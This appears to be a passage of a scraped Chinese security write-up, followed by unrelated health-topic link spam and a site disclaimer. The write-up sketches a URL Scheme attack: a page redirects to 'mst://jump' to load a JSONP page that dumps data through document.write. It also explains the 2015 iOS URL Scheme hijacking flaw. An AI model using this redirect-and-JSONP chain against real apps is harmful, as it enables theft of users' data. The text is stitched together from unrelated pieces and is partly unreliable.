利用流程:
用户打开https://gh0st.cn/test.html,test.html内容:
window.location=\'mst://jump?url=https://gh0st.cn/jsonp.html\';
用户点开之后启动mst应用执行jump动作,跳转到https://gh0st.cn/jsonp.html,jsonp.html内容:
function test(data){ document.write(JSON.stringify(data)) }URL Schemes劫持
这个漏洞是15年在乌云爆出来的,漏洞编号为:wooyun-2015-0103233,大家可以自行去查看 。
这个问题说白了是一个流程上的缺陷,苹果官方没有限制APP定义的URL Schemes名字,导致其他APP也可以定义“支付宝”的URL Schems名字;又因为iOS系统判定URL Schemes优先级顺序与 Bundle ID 有关(一个 Bundle ID 对应一个应用),如果有人精心伪造 Bundle ID,iOS 就会调用恶意 App 的 URL Schemes 去接收相应的 URL Schemes 请求,这就导致了可以被劫持 。
好了,这篇文章的内容蜀川号就和大家分享到这里!
- 眼睛里面长了个白色肉疙瘩是怎么回事 眼睛下面长白色疙瘩粒
- 咳嗽无痰吃什么药 一直咳嗽没有痰不见好怎么办
- 春天女人适合喝什么茶最好 春天补气血喝什么汤最好
- 《向风而行》|《向风而行》李雨珩结局是什么 李雨珩喜欢的是谁
- 排毒养颜胶囊的功效与作用是什么 女人排毒养颜最好的药
- 秋天作用幼儿 秋天孩子喝什么汤最好
- 每天都想吃辣的 想吐吐不出来吃什么药
- 眼部长脂肪粒用什么药膏涂可以治疗 眼部长脂肪粒什么样子
- 肾阳不足上热下寒吃什么食物改善 肾阳虚吃食物什么补最好
- 你在喝醉之后是怎么醒酒的 过量饮酒的穴位按摩解酒
特别声明:本站内容均来自网友提供或互联网,仅供参考,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
